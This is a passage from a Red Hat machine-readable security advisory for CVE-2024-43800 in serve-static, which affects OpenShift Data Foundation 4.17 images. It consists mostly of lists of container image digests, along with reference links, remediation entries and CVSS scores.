"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43800", }, { category: "external", summary: "RHBZ#2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43800", url: "https://www.cve.org/CVERecord?id=CVE-2024-43800", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", url: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", url: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", }, { category: "external", summary: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", url: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", }, ], release_date: "2024-09-10T15:15:17.937000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-30T14:25:22+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8676", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", 